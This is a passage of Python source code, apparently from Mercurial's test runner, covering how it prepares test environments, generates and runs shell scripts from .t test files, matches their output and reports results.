if os.path.exists(cargo_home_path) and b"CARGO_HOME" not in osenvironb:
env["CARGO_HOME"] = cargo_home_path
if os.path.exists(rustup_home_path) and b"RUSTUP_HOME" not in osenvironb:
env["RUSTUP_HOME"] = rustup_home_path
# Reset some environment variables to well-known values so that
# the tests produce repeatable output.
env["LANG"] = env["LC_ALL"] = env["LANGUAGE"] = "C"
env["TZ"] = "GMT"
env["EMAIL"] = "Foo Bar <foo.bar@example.com>"
env["COLUMNS"] = "80"
env["TERM"] = "xterm"
dropped = [
"CDPATH",
"CHGDEBUG",
"EDITOR",
"GREP_OPTIONS",
"HG",
"HGMERGE",
"HGPLAIN",
"HGPLAINEXCEPT",
"HGPROF",
"http_proxy",
"no_proxy",
"NO_PROXY",
"PAGER",
"VISUAL",
]
for k in dropped:
if k in env:
del env[k]
# unset env related to hooks
for k in list(env):
if k.startswith("HG_"):
del env[k]
if self._usechg:
env["CHGSOCKNAME"] = os.path.join(self._chgsockdir, b"server")
if self._chgdebug:
env["CHGDEBUG"] = "true"
return env
def _createhgrc(self, path):
"""Create an hgrc file for this test."""
with open(path, "wb") as hgrc:
hgrc.write(b"[ui]\n")
hgrc.write(b"slash = True\n")
hgrc.write(b"interactive = False\n")
hgrc.write(b"detailed-exit-code = True\n")
hgrc.write(b"merge = internal:merge\n")
hgrc.write(b"mergemarkers = detailed\n")
hgrc.write(b"promptecho = True\n")
hgrc.write(b"timeout.warn=15\n")
hgrc.write(b"[defaults]\n")
hgrc.write(b"[devel]\n")
hgrc.write(b"all-warnings = true\n")
hgrc.write(b"default-date = 0 0\n")
hgrc.write(b"[largefiles]\n")
hgrc.write(
b"usercache = %s\n"
% (os.path.join(self._testtmp, b".cache/largefiles"))
)
hgrc.write(b"[lfs]\n")
hgrc.write(
b"usercache = %s\n" % (os.path.join(self._testtmp, b".cache/lfs"))
)
hgrc.write(b"[web]\n")
hgrc.write(b"address = localhost\n")
hgrc.write(b"ipv6 = %r\n" % self._useipv6)
hgrc.write(b"server-header = testing stub value\n")
for opt in self._extraconfigopts:
section, key = _sys2bytes(opt).split(b".", 1)
assert b"=" in key, (
"extra config opt %s must " "have an = for assignment" % opt
)
hgrc.write(b"[%s]\n%s\n" % (section, key))
def fail(self, msg):
# unittest differentiates between errored and failed.
# Failed is denoted by AssertionError (by default at least).
raise AssertionError(msg)
def _runcommand(self, cmd, env, normalizenewlines=False):
"""Run command in a sub-process, capturing the output (stdout and
stderr).
Return a tuple (exitcode, output). output is None in debug mode.
"""
if self._debug:
proc = subprocess.Popen(
_bytes2sys(cmd),
shell=True,
cwd=_bytes2sys(self._testtmp),
env=env,
)
ret = proc.wait()
return (ret, None)
proc = Popen4(cmd, self._testtmp, self._timeout, env)
def cleanup():
terminate(proc)
ret = proc.wait()
if ret == 0:
ret = signal.SIGTERM << 8
killdaemons(env["DAEMON_PIDS"])
return ret
proc.tochild.close()
try:
output = proc.fromchild.read()
except KeyboardInterrupt:
vlog("# Handling keyboard interrupt")
cleanup()
raise
ret = proc.wait()
if wifexited(ret):
ret = os.WEXITSTATUS(ret)
if proc.timeout:
ret = "timeout"
if ret:
killdaemons(env["DAEMON_PIDS"])
for s, r in self._getreplacements():
output = re.sub(s, r, output)
if normalizenewlines:
output = output.replace(b"\r\n", b"\n")
return ret, output.splitlines(True)
class PythonTest(Test):
"""A Python-based test."""
@property
def refpath(self):
return os.path.join(self._testdir, b"%s.out" % self.bname)
def _run(self, env):
# Quote the python(3) executable for Windows
cmd = b'"%s" "%s"' % (PYTHON, self.path)
vlog("# Running", cmd.decode("utf-8"))
normalizenewlines = os.name == "nt"
result = self._runcommand(cmd, env, normalizenewlines=normalizenewlines)
if self._aborted:
raise KeyboardInterrupt()
return result
# Some glob patterns apply only in some circumstances, so the script
# might want to remove (glob) annotations that otherwise should be
# retained.
checkcodeglobpats = [
# On Windows it looks like \ doesn't require a (glob), but we know
# better.
re.compile(br"^pushing to \$TESTTMP/.*[^)]$"),
re.compile(br"^moving \S+/.*[^)]$"),
re.compile(br"^pulling from \$TESTTMP/.*[^)]$"),
# Not all platforms have 127.0.0.1 as loopback (though most do),
# so we always glob that too.
re.compile(br".*\$LOCALIP.*$"),
]
bchr = chr
if PYTHON3:
bchr = lambda x: bytes([x])
WARN_UNDEFINED = 1
WARN_YES = 2
WARN_NO = 3
MARK_OPTIONAL = b" (?)\n"
def isoptional(line):
return line.endswith(MARK_OPTIONAL)
class TTest(Test):
"""A "t test" is a test backed by a .t file."""
SKIPPED_PREFIX = b"skipped: "
FAILED_PREFIX = b"hghave check failed: "
NEEDESCAPE = re.compile(br"[\x00-\x08\x0b-\x1f\x7f-\xff]").search
ESCAPESUB = re.compile(br"[\x00-\x08\x0b-\x1f\\\x7f-\xff]").sub
ESCAPEMAP = {bchr(i): br"\x%02x" % i for i in range(256)}
ESCAPEMAP.update({b"\\": b"\\\\", b"\r": br"\r"})
def __init__(self, path, *args, **kwds):
# accept an extra "case" parameter
case = kwds.pop("case", [])
self._case = case
self._allcases = {x for y in parsettestcases(path) for x in y}
super(TTest, self).__init__(path, *args, **kwds)
if case:
casepath = b"#".join(case)
self.name = "%s#%s" % (self.name, _bytes2sys(casepath))
self.errpath = b"%s#%s.err" % (self.errpath[:-4], casepath)
self._tmpname += b"-%s" % casepath.replace(b"#", b"-")
self._have = {}
@property
def refpath(self):
return os.path.join(self._testdir, self.bname)
def _run(self, env):
with open(self.path, "rb") as f:
lines = f.readlines()
# .t file is both reference output and the test input, keep reference
# output updated with the the test input. This avoids some race
# conditions where the reference output does not match the actual test.
if self._refout is not None:
self._refout = lines
salt, script, after, expected = self._parsetest(lines)
# Write out the generated script.
fname = b"%s.sh" % self._testtmp
with open(fname, "wb") as f:
for l in script:
f.write(l)
cmd = b'%s "%s"' % (self._shell, fname)
vlog("# Running", cmd.decode("utf-8"))
exitcode, output = self._runcommand(cmd, env)
if self._aborted:
raise KeyboardInterrupt()
# Do not merge output if skipped. Return hghave message instead.
# Similarly, with --debug, output is None.
if exitcode == self.SKIPPED_STATUS or output is None:
return exitcode, output
return self._processoutput(exitcode, output, salt, after, expected)
def _hghave(self, reqs):
allreqs = b" ".join(reqs)
self._detectslow(reqs)
if allreqs in self._have:
return self._have.get(allreqs)
# TODO do something smarter when all other uses of hghave are gone.
runtestdir = osenvironb[b"RUNTESTDIR"]
tdir = runtestdir.replace(b"\\", b"/")
proc = Popen4(
b'%s -c "%s/hghave %s"' % (self._shell, tdir, allreqs),
self._testtmp,
0,
self._getenv(),
)
stdout, stderr = proc.communicate()
ret = proc.wait()
if wifexited(ret):
ret = os.WEXITSTATUS(ret)
if ret == 2:
print(stdout.decode("utf-8"))
sys.exit(1)
if ret != 0:
self._have[allreqs] = (False, stdout)
return False, stdout
self._have[allreqs] = (True, None)
return True, None
def _detectslow(self, reqs):
"""update the timeout of slow test when appropriate"""
if b"slow" in reqs:
self._timeout = self._slowtimeout
def _iftest(self, args):
# implements "#if"
reqs = []
for arg in args:
if arg.startswith(b"no-") and arg[3:] in self._allcases:
if arg[3:] in self._case:
return False
elif arg in self._allcases:
if arg not in self._case:
return False
else:
reqs.append(arg)
self._detectslow(reqs)
return self._hghave(reqs)[0]
def _parsetest(self, lines):
# We generate a shell script which outputs unique markers to line
# up script results with our source. These markers include input
# line number and the last return code.
salt = b"SALT%d" % time.time()
def addsalt(line, inpython):
if inpython:
script.append(b"%s %d 0\n" % (salt, line))
else:
script.append(b"echo %s %d $?\n" % (salt, line))
activetrace = []
session = str(uuid.uuid4())
if PYTHON3:
session = session.encode("ascii")
hgcatapult = os.getenv("HGTESTCATAPULTSERVERPIPE") or os.getenv(
"HGCATAPULTSERVERPIPE"
)
def toggletrace(cmd=None):
if not hgcatapult or hgcatapult == os.devnull:
return
if activetrace:
script.append(
b'echo END %s %s >> "$HGTESTCATAPULTSERVERPIPE"\n'
% (session, activetrace[0])
)
if cmd is None:
return
if isinstance(cmd, str):
quoted = shellquote(cmd.strip())
else:
quoted = shellquote(cmd.strip().decode("utf8")).encode("utf8")
quoted = quoted.replace(b"\\", b"\\\\")
script.append(
b'echo START %s %s >> "$HGTESTCATAPULTSERVERPIPE"\n' % (session, quoted)
)
activetrace[0:] = [quoted]
script = []
# After we run the shell script, we re-unify the script output
# with non-active parts of the source, with synchronization by our
# SALT line number markers. The after table contains the non-active
# components, ordered by line number.
after = {}
# Expected shell script output.
expected = {}
pos = prepos = -1
# True or False when in a true or false conditional section
skipping = None
# We keep track of whether or not we're in a Python block so we
# can generate the surrounding doctest magic.
inpython = False
if self._debug:
script.append(b"set -x\n")
if self._hgcommand != b"hg":
script.append(b'alias hg="%s"\n' % self._hgcommand)
if os.getenv("MSYSTEM"):
script.append(b'alias pwd="pwd -W"\n')
if hgcatapult and hgcatapult != os.devnull:
if PYTHON3:
hgcatapult = hgcatapult.encode("utf8")
cataname = self.name.encode("utf8")
else:
cataname = self.name
# Kludge: use a while loop to keep the pipe from getting
# closed by our echo commands. The still-running file gets
# reaped at the end of the script, which causes the while
# loop to exit and closes the pipe. Sigh.
script.append(
b"rtendtracing() {\n"
b" echo END %(session)s %(name)s >> %(catapult)s\n"
b' rm -f "$TESTTMP/.still-running"\n'
b"}\n"
b'trap "rtendtracing" 0\n'
b'touch "$TESTTMP/.still-running"\n'
b'while [ -f "$TESTTMP/.still-running" ]; do sleep 1; done '
b"> %(catapult)s &\n"
b"HGCATAPULTSESSION=%(session)s ; export HGCATAPULTSESSION\n"
b"echo START %(session)s %(name)s >> %(catapult)s\n"
% {
b"name": cataname,
b"session": session,
b"catapult": hgcatapult,
}
)
if self._case:
casestr = b"#".join(self._case)
if isinstance(casestr, str):
quoted = shellquote(casestr)
else:
quoted = shellquote(casestr.decode("utf8")).encode("utf8")
script.append(b"TESTCASE=%s\n" % quoted)
script.append(b"export TESTCASE\n")
n = 0
for n, l in enumerate(lines):
if not l.endswith(b"\n"):
l += b"\n"
if l.startswith(b"#require"):
lsplit = l.split()
if len(lsplit) < 2 or lsplit[0] != b"#require":
after.setdefault(pos, []).append(b" !!! invalid #require\n")
if not skipping:
haveresult, message = self._hghave(lsplit[1:])
if not haveresult:
script = [b'echo "%s"\nexit 80\n' % message]
break
after.setdefault(pos, []).append(l)
elif l.startswith(b"#if"):
lsplit = l.split()
if len(lsplit) < 2 or lsplit[0] != b"#if":
after.setdefault(pos, []).append(b" !!! invalid #if\n")
if skipping is not None:
after.setdefault(pos, []).append(b" !!! nested #if\n")
skipping = not self._iftest(lsplit[1:])
after.setdefault(pos, []).append(l)
elif l.startswith(b"#else"):
if skipping is None:
after.setdefault(pos, []).append(b" !!! missing #if\n")
skipping = not skipping
after.setdefault(pos, []).append(l)
elif l.startswith(b"#endif"):
if skipping is None:
after.setdefault(pos, []).append(b" !!! missing #if\n")
skipping = None
after.setdefault(pos, []).append(l)
elif skipping:
after.setdefault(pos, []).append(l)
elif l.startswith(b" >>> "): # python inlines
after.setdefault(pos, []).append(l)
prepos = pos
pos = n
if not inpython:
# We've just entered a Python block. Add the header.
inpython = True
addsalt(prepos, False) # Make sure we report the exit code.
script.append(b'"%s" -m heredoctest <<EOF\n' % PYTHON)
addsalt(n, True)
script.append(l[2:])
elif l.startswith(b" ... "): # python inlines
after.setdefault(prepos, []).append(l)
script.append(l[2:])
elif l.startswith(b" $ "): # commands
if inpython:
script.append(b"EOF\n")
inpython = False
after.setdefault(pos, []).append(l)
prepos = pos
pos = n
addsalt(n, False)
rawcmd = l[4:]
cmd = rawcmd.split()
toggletrace(rawcmd)
if len(cmd) == 2 and cmd[0] == b"cd":
rawcmd = b"cd %s || exit 1\n" % cmd[1]
script.append(rawcmd)
elif l.startswith(b" > "): # continuations
after.setdefault(prepos, []).append(l)
script.append(l[4:])
elif l.startswith(b" "): # results
# Queue up a list of expected results.
expected.setdefault(pos, []).append(l[2:])
else:
if inpython:
script.append(b"EOF\n")
inpython = False
# Non-command/result. Queue up for merged output.
after.setdefault(pos, []).append(l)
if inpython:
script.append(b"EOF\n")
if skipping is not None:
after.setdefault(pos, []).append(b" !!! missing #endif\n")
addsalt(n + 1, False)
# Need to end any current per-command trace
if activetrace:
toggletrace()
return salt, script, after, expected
def _processoutput(self, exitcode, output, salt, after, expected):
# Merge the script output back into a unified test.
warnonly = WARN_UNDEFINED # 1: not yet; 2: yes; 3: for sure not
if exitcode != 0:
warnonly = WARN_NO
pos = -1
postout = []
for out_rawline in output:
out_line, cmd_line = out_rawline, None
if salt in out_rawline:
out_line, cmd_line = out_rawline.split(salt, 1)
pos, postout, warnonly = self._process_out_line(
out_line, pos, postout, expected, warnonly
)
pos, postout = self._process_cmd_line(cmd_line, pos, postout, after)
if pos in after:
postout += after.pop(pos)
if warnonly == WARN_YES:
exitcode = False # Set exitcode to warned.
return exitcode, postout
def _process_out_line(self, out_line, pos, postout, expected, warnonly):
while out_line:
if not out_line.endswith(b"\n"):
out_line += b" (no-eol)\n"
# Find the expected output at the current position.
els = [None]
if expected.get(pos, None):
els = expected[pos]
optional = []
for i, el in enumerate(els):
r = False
if el:
r, exact = self.linematch(el, out_line)
if isinstance(r, str):
if r == "-glob":
out_line = "".join(el.rsplit(" (glob)", 1))
r = "" # Warn only this line.
elif r == "retry":
postout.append(b" " + el)
else:
log("\ninfo, unknown linematch result: %r\n" % r)
r = False
if r:
els.pop(i)
break
if el:
if isoptional(el):
optional.append(i)
else:
m = optline.match(el)
if m:
conditions = [c for c in m.group(2).split(b" ")]
if not self._iftest(conditions):
optional.append(i)
if exact:
# Don't allow line to be matches against a later
# line in the output
els.pop(i)
break
if r:
if r == "retry":
continue
# clean up any optional leftovers
for i in optional:
postout.append(b" " + els[i])
for i in reversed(optional):
del els[i]
postout.append(b" " + el)
else:
if self.NEEDESCAPE(out_line):
out_line = TTest._stringescape(
b"%s (esc)\n" % out_line.rstrip(b"\n")
)
postout.append(b" " + out_line) # Let diff deal with it.
if r != "": # If line failed.
warnonly = WARN_NO
elif warnonly == WARN_UNDEFINED:
warnonly = WARN_YES
break
else:
# clean up any optional leftovers
while expected.get(pos, None):
el = expected[pos].pop(0)
if el:
if not isoptional(el):
m = optline.match(el)
if m:
conditions = [c for c in m.group(2).split(b" ")]
if self._iftest(conditions):
# Don't append as optional line
continue
else:
continue
postout.append(b" " + el)
return pos, postout, warnonly
def _process_cmd_line(self, cmd_line, pos, postout, after):
"""process a "command" part of a line from unified test output"""
if cmd_line:
# Add on last return code.
ret = int(cmd_line.split()[1])
if ret != 0:
postout.append(b" [%d]\n" % ret)
if pos in after:
# Merge in non-active test bits.
postout += after.pop(pos)
pos = int(cmd_line.split()[0])
return pos, postout
@staticmethod
def rematch(el, l):
try:
# parse any flags at the beginning of the regex. Only 'i' is
# supported right now, but this should be easy to extend.
flags, el = re.match(br"^(\(\?i\))?(.*)", el).groups()[0:2]
flags = flags or b""
el = flags + b"(?:" + el + b")"
# use \Z to ensure that the regex matches to the end of the string
if os.name == "nt":
return re.match(el + br"\r?\n\Z", l)
return re.match(el + br"\n\Z", l)
except re.error:
# el is an invalid regex
return False
@staticmethod
def globmatch(el, l):
# The only supported special characters are * and ? plus / which also
# matches \ on windows. Escaping of these characters is supported.
if el + b"\n" == l:
if os.altsep:
# matching on "/" is not needed for this line
for pat in checkcodeglobpats:
if pat.match(el):
return True
return b"-glob"
return True
el = el.replace(b"$LOCALIP", b"*")
i, n = 0, len(el)
res = b""
while i < n:
c = el[i : i + 1]
i += 1
if c == b"\\" and i < n and el[i : i + 1] in b"*?\\/":
res += el[i - 1 : i + 1]
i += 1
elif c == b"*":
res += b".*"
elif c == b"?":
res += b"."
elif c == b"/" and os.altsep:
res += b"[/\\\\]"
else:
res += re.escape(c)
return TTest.rematch(res, l)
def linematch(self, el, l):
if el == l: # perfect match (fast)
return True, True
retry = False
if isoptional(el):
retry = "retry"
el = el[: -len(MARK_OPTIONAL)] + b"\n"
else:
m = optline.match(el)
if m:
conditions = [c for c in m.group(2).split(b" ")]
el = m.group(1) + b"\n"
if not self._iftest(conditions):
# listed feature missing, should not match
return "retry", False
if el.endswith(b" (esc)\n"):
if PYTHON3:
el = el[:-7].decode("unicode_escape") + "\n"
el = el.encode("latin-1")
else:
el = el[:-7].decode("string-escape") + "\n"
if el == l or os.name == "nt" and el[:-1] + b"\r\n" == l:
return True, True
if el.endswith(b" (re)\n"):
return (TTest.rematch(el[:-6], l) or retry), False
if el.endswith(b" (glob)\n"):
# ignore '(glob)' added to l by 'replacements'
if l.endswith(b" (glob)\n"):
l = l[:-8] + b"\n"
return (TTest.globmatch(el[:-8], l) or retry), False
if os.altsep:
_l = l.replace(b"\\", b"/")
if el == _l or os.name == "nt" and el[:-1] + b"\r\n" == _l:
return True, True
return retry, True
@staticmethod
def parsehghaveoutput(lines):
"""Parse hghave log lines.
Return tuple of lists (missing, failed):
* the missing/unknown features
* the features for which existence check failed"""
missing = []
failed = []
for line in lines:
if line.startswith(TTest.SKIPPED_PREFIX):
line = line.splitlines()[0]
missing.append(_bytes2sys(line[len(TTest.SKIPPED_PREFIX) :]))
elif line.startswith(TTest.FAILED_PREFIX):
line = line.splitlines()[0]
failed.append(_bytes2sys(line[len(TTest.FAILED_PREFIX) :]))
return missing, failed
@staticmethod
def _escapef(m):
return TTest.ESCAPEMAP[m.group(0)]
@staticmethod
def _stringescape(s):
return TTest.ESCAPESUB(TTest._escapef, s)
iolock = threading.RLock()
firstlock = threading.RLock()
firsterror = False
class TestResult(unittest._TextTestResult):
"""Holds results when executing via unittest."""
# Don't worry too much about accessing the non-public _TextTestResult.
# It is relatively common in Python testing tools.
def __init__(self, options, *args, **kwargs):
super(TestResult, self).__init__(*args, **kwargs)
self._options = options
# unittest.TestResult didn't have skipped until 2.7. We need to
# polyfill it.
self.skipped = []
# We have a custom "ignored" result that isn't present in any Python
# unittest implementation. It is very similar to skipped. It may make
# sense to map it into skip some day.
self.ignored = []
self.times = []
self._firststarttime = None
# Data stored for the benefit of generating xunit reports.
self.successes = []
self.faildata = {}
if options.color == "auto":
self.color = pygmentspresent and self.stream.isatty()
elif options.color == "never":
self.color = False
else: # 'always', for testing purposes
self.color = pygmentspresent
def onStart(self, test):
"""Can be overriden by custom TestResult"""
def onEnd(self):
"""Can be overriden by custom TestResult"""
def addFailure(self, test, reason):
self.failures.append((test, reason))
if self._options.first:
self.stop()
else:
with iolock:
if reason == "timed out":
self.stream.write("t")
else:
if not self._options.nodiff:
self.stream.write("\n")
# Exclude the '\n' from highlighting to lex correctly
formatted = "ERROR: %s output changed\n" % test
self.stream.write(highlightmsg(formatted, self.color))
self.stream.write("!")
self.stream.flush()
def addSuccess(self, test):
with iolock:
super(TestResult, self).addSuccess(test)
self.successes.append(test)
def addError(self, test, err):
super(TestResult, self).addError(test, err)
if self._options.first:
self.stop()
# Polyfill.
def addSkip(self, test, reason):
self.skipped.append((test, reason))
with iolock:
if self.showAll:
self.stream.writeln("skipped %s" % reason)
else:
self.stream.write("s")
self.stream.flush()
def addIgnore(self, test, reason):
self.ignored.append((test, reason))
with iolock:
if self.showAll:
self.stream.writeln("ignored %s" % reason)
else:
if reason not in ("not retesting", "doesn't match keyword"):
self.stream.write("i")
else:
self.testsRun += 1
self.stream.flush()
def addOutputMismatch(self, test, ret, got, expected):
"""Record a mismatch in test output for a particular test."""
if self.shouldStop or firsterror:
# don't print, some other test case already failed and
# printed, we're just stale and probably failed due to our
# temp dir getting cleaned up.
return
accepted = False
lines = []
with iolock:
if self._options.nodiff:
pass
elif self._options.view:
v = self._options.view
subprocess.call(
r'"%s" "%s" "%s"'
% (v, _bytes2sys(test.refpath), _bytes2sys(test.errpath)),
shell=True,
)
else:
servefail, lines = getdiff(expected, got, test.refpath, test.errpath)
self.stream.write("\n")
for line in lines:
line = highlightdiff(line, self.color)
if PYTHON3:
self.stream.flush()
self.stream.buffer.write(line)
self.stream.buffer.flush()
else:
self.stream.write(line)
self.stream.flush()
if servefail:
raise test.failureException(
"server failed to start (HGPORT=%s)" % test._startport
)
# handle interactive prompt without releasing iolock
if self._options.interactive:
if test.readrefout() != expected:
self.stream.write(
"Reference output has changed (run again to prompt " "changes)"
)
else:
self.stream.write("Accept this change? [y/N] ")
self.stream.flush()
answer = sys.stdin.readline().strip()
if answer.lower() in ("y", "yes"):
if test.path.endswith(b".t"):
rename(test.errpath, test.path)
else:
rename(test.errpath, b"%s.out" % test.path)
accepted = True
if not accepted:
self.faildata[test.name] = b"".join(lines)
return accepted
def startTest(self, test):
super(TestResult, self).startTest(test)
# os.times module computes the user time and system time spent by
# child's processes along with real elapsed time taken by a process.
# This module has one limitation. It can only work for Linux user
# and not for Windows. Hence why we fall back to another function
# for wall time calculations.
test.started_times = os.times()
# TODO use a monotonic clock once support for Python 2.7 is dropped.
test.started_time = time.time()
if self._firststarttime is None: # thread racy but irrelevant
self._firststarttime = test.started_time
def stopTest(self, test, interrupted=False):
super(TestResult, self).stopTest(test)
test.stopped_times = os.times()
stopped_time = time.time()
starttime = test.started_times
endtime = test.stopped_times
origin = self._firststarttime
self.times.append(
(
test.name,
endtime[2] - starttime[2], # user space CPU time
endtime[3] - starttime[3], # sys space CPU time
stopped_time - test.started_time, # real time
test.started_time - origin, # start date in run context
stopped_time - origin, # end date in run context
)
)
if interrupted:
with iolock:
self.stream.writeln(
"INTERRUPTED: %s (after %d seconds)"
% (test.name, self.times[-1][3])
)
def getTestResult():
"""
Returns the relevant test result
"""
if "CUSTOM_TEST_RESULT" in os.environ:
testresultmodule = __import__(os.environ["CUSTOM_TEST_RESULT"])
return testresultmodule.TestResult
else:
return TestResult
class TestSuite(unittest.TestSuite):
"""Custom unittest TestSuite that knows how to execute Mercurial tests."""
def __init__(
self,
testdir,
jobs=1,
whitelist=None,
blacklist=None,
keywords=None,
loop=False,
runs_per_test=1,
loadtest=None,
showchannels=False,
*args,
**kwargs
):
"""Create a new instance that can run tests with a configuration.
testdir specifies the directory where tests are executed from. This
is typically the ``tests`` directory from Mercurial's source
repository.
jobs specifies the number of jobs to run concurrently. Each test
executes on its own thread. Tests actually spawn new processes, so
state mutation should not be an issue.
If there is only one job, it will use the main thread.
whitelist and blacklist denote tests that have been whitelisted and
blacklisted, respectively. These arguments don't belong in TestSuite.
Instead, whitelist and blacklist should be handled by the thing that
populates the TestSuite with tests. They are present to preserve
backwards compatible behavior which reports skipped tests as part
of the results.
keywords denotes key words that will be used to filter which tests
to execute. This arguably belongs outside of TestSuite.
loop denotes whether to loop over tests forever.
"""
super(TestSuite, self).__init__(*args, **kwargs)
self._jobs = jobs
self._whitelist = whitelist
self._blacklist = blacklist
self._keywords = keywords
self._loop = loop
self._runs_per_test = runs_per_test
self._loadtest = loadtest
self._showchannels = showchannels
def run(self, result):
# We have a number of filters that need to be applied. We do this
# here instead of inside Test because it makes the running logic for
# Test simpler.
tests = []
num_tests = [0]
for test in self._tests:
def get():
num_tests[0] += 1
if getattr(test, "should_reload", False):
return self._loadtest(test, num_tests[0])
return test
if not os.path.exists(test.path):
result.addSkip(test, "Doesn't exist")
continue
is_whitelisted = self._whitelist and (
test.relpath in self._whitelist or test.bname in self._whitelist
)
if not is_whitelisted:
is_blacklisted = self._blacklist and (
test.relpath in self._blacklist or test.bname in self._blacklist
)
if is_blacklisted:
result.addSkip(test, "blacklisted")
continue
if self._keywords:
with open(test.path, "rb") as f:
t = f.read().lower() + test.bname.lower()
ignored = False
for k in self._keywords.lower().split():
if k not in t:
result.addIgnore(test, "doesn't match keyword")
ignored = True
break
if ignored:
continue
for _ in xrange(self._runs_per_test):
tests.append(get())
runtests = list(tests)
done = queue.Queue()
running = 0
channels = [""] * self._jobs
def job(test, result):
for n, v in enumerate(channels):
if not v:
channel = n
break
else:
raise ValueError("Could not find output channel")
channels[channel] = "=" + test.name[5:].split(".")[0]
try:
test(result)
done.put(None)
except KeyboardInterrupt:
pass
except: # re-raises
done.put(("!", test, "run-test raised an error, see traceback"))
raise
finally:
try:
channels[channel] = ""
except IndexError:
pass
def stat():
count = 0
while channels:
d = "\n%03s " % count
for n, v in enumerate(channels):
if v:
d += v[0]
channels[n] = v[1:] or "."
else:
d += " "
d += " "
with iolock:
sys.stdout.write(d + " ")
sys.stdout.flush()
for x in xrange(10):
if channels:
time.sleep(0.1)
count += 1
stoppedearly = False
if self._showchannels:
statthread = threading.Thread(target=stat, name="stat")
statthread.start()
try:
while tests or running:
if not done.empty() or running == self._jobs or not tests:
try:
done.get(True, 1)
running -= 1
if result and result.shouldStop:
stoppedearly = True
break
except queue.Empty:
continue
if tests and not running == self._jobs:
test = tests.pop(0)
if self._loop:
if getattr(test, "should_reload", False):
num_tests[0] += 1
tests.append(self._loadtest(test, num_tests[0]))
else:
tests.append(test)
if self._jobs == 1:
job(test, result)
else:
t = threading.Thread(
target=job, name=test.name, args=(test, result)
)
t.start()
running += 1
# If we stop early we still need to wait on started tests to
# finish. Otherwise, there is a race between the test completing
# and the test's cleanup code running. This could result in the
# test reporting incorrect.
if stoppedearly:
while running:
try:
done.get(True, 1)
running -= 1
except queue.Empty:
continue
except KeyboardInterrupt:
for test in runtests:
test.abort()
channels = []
return result
# Save the most recent 5 wall-clock runtimes of each test to a
# human-readable text file named .testtimes. Tests are sorted
# alphabetically, while times for each test are listed from oldest to
# newest.
def loadtimes(outputdir):
times = []
try:
with open(os.path.join(outputdir, b".testtimes")) as fp:
for line in fp:
m = re.match("(.*?) ([0-9. ]+)", line)
times.append((m.group(1), [float(t) for t in m.group(2).split()]))
except IOError as err:
if err.errno != errno.ENOENT:
raise
return times
def savetimes(outputdir, result):
saved = dict(loadtimes(outputdir))
maxruns = 5
skipped = {str(t[0]) for t in result.skipped}
for tdata in result.times:
test, real = tdata[0], tdata[3]
if test not in skipped:
ts = saved.setdefault(test, [])
ts.append(real)
ts[:] = ts[-maxruns:]
fd, tmpname = tempfile.mkstemp(prefix=b".testtimes", dir=outputdir, text=True)
with os.fdopen(fd, "w") as fp:
for name, ts in sorted(saved.items()):
fp.write("%s %s\n" % (name, " ".join(["%.3f" % (t,) for t in ts])))
timepath = os.path.join(outputdir, b".testtimes")
try:
os.unlink(timepath)
except OSError:
pass
try:
os.rename(tmpname, timepath)
except OSError:
pass
class TextTestRunner(unittest.TextTestRunner):
"""Custom unittest test runner that uses appropriate settings."""
def __init__(self, runner, *args, **kwargs):
super(TextTestRunner, self).__init__(*args, **kwargs)
self._runner = runner
self._result = getTestResult()(
self._runner.options, self.stream, self.descriptions, self.verbosity
)
def listtests(self, test):
test = sorted(test, key=lambda t: t.name)
self._result.onStart(test)
for t in test:
print(t.name)
self._result.addSuccess(t)
if self._runner.options.xunit:
with open(self._runner.options.xunit, "wb") as xuf:
self._writexunit(self._result, xuf)
if self._runner.options.json:
jsonpath = os.path.join(self._runner._outputdir, b"report.json")
with open(jsonpath, "w") as fp:
self._writejson(self._result, fp)
return self._result
def run(self, test):
self._result.onStart(test)
test(self._result)
failed = len(self._result.failures)
skipped = len(self._result.skipped)
ignored = len(self._result.ignored)
with iolock:
self.stream.writeln("")
if not self._runner.options.noskips:
for test, msg in sorted(self._result.skipped, key=lambda s: s[0].name):
formatted = "Skipped %s: %s\n" % (test.name, msg)
msg = highlightmsg(formatted, self._result.color)
self.stream.write(msg)
for test, msg in sorted(self._result.failures, key=lambda f: f[0].name):
formatted = "Failed %s: %s\n" % (test.name, msg)
self.stream.write(highlightmsg(formatted, self._result.color))
for test, msg in sorted(self._result.errors, key=lambda e: e[0].name):
self.stream.writeln("Errored %s: %s" % (test.name, msg))
if self._runner.options.xunit:
with open(self._runner.options.xunit, "wb") as xuf:
self._writexunit(self._result, xuf)
if self._runner.options.json:
jsonpath = os.path.join(self._runner._outputdir, b"report.json")
with open(jsonpath, "w") as fp:
self._writejson(self._result, fp)
self._runner._checkhglib("Tested")
savetimes(self._runner._outputdir, self._result)
if failed and self._runner.options.known_good_rev:
self._bisecttests(t for t, m in self._result.failures)
self.stream.writeln(
"# Ran %d tests, %d skipped, %d failed."
% (self._result.testsRun, skipped + ignored, failed)
)
if failed:
self.stream.writeln(
"python hash seed: %s" % os.environ["PYTHONHASHSEED"]
)
if self._runner.options.time:
self.printtimes(self._result.times)
if self._runner.options.exceptions:
exceptions = aggregateexceptions(
os.path.join(self._runner._outputdir, b"exceptions")
)
self.stream.writeln("Exceptions Report:")
self.stream.writeln(
"%d total from %d frames"
% (exceptions["total"], len(exceptions["exceptioncounts"]))
)
combined = exceptions["combined"]
for key in sorted(combined, key=combined.get, reverse=True):
frame, line, exc = key
totalcount, testcount, leastcount, leasttest = combined[key]
self.stream.writeln(
"%d (%d tests)\t%s: %s (%s - %d total)"
% (
totalcount,
testcount,
frame,
exc,
leasttest,
leastcount,
)
)
self.stream.flush()
return self._result
def _bisecttests(self, tests):
bisectcmd = ["hg", "bisect"]
bisectrepo = self._runner.options.bisect_repo
if bisectrepo:
bisectcmd.extend(["-R", os.path.abspath(bisectrepo)])
def pread(args):
env = os.environ.copy()
env["HGPLAIN"] = "1"
p = subprocess.Popen(
args, stderr=subprocess.STDOUT, stdout=subprocess.PIPE, env=env
)
data = p.stdout.read()
p.wait()
return data
for test in tests:
pread(bisectcmd + ["--reset"]),
pread(bisectcmd + ["--bad", "."])
pread(bisectcmd + ["--good", self._runner.options.known_good_rev])
# TODO: we probably need to forward more options
# that alter hg's behavior inside the tests.
opts = ""
withhg = self._runner.options.with_hg
if withhg:
opts += " --with-hg=%s " % shellquote(_bytes2sys(withhg))
rtc = "%s %s %s %s" % (sysexecutable, sys.argv[0], opts, test)
data = pread(bisectcmd + ["--command", rtc])
m = re.search(
(
br"\nThe first (?P<goodbad>bad|good) revision "
br"is:\nchangeset: +\d+:(?P<node>[a-f0-9]+)\n.*\n"
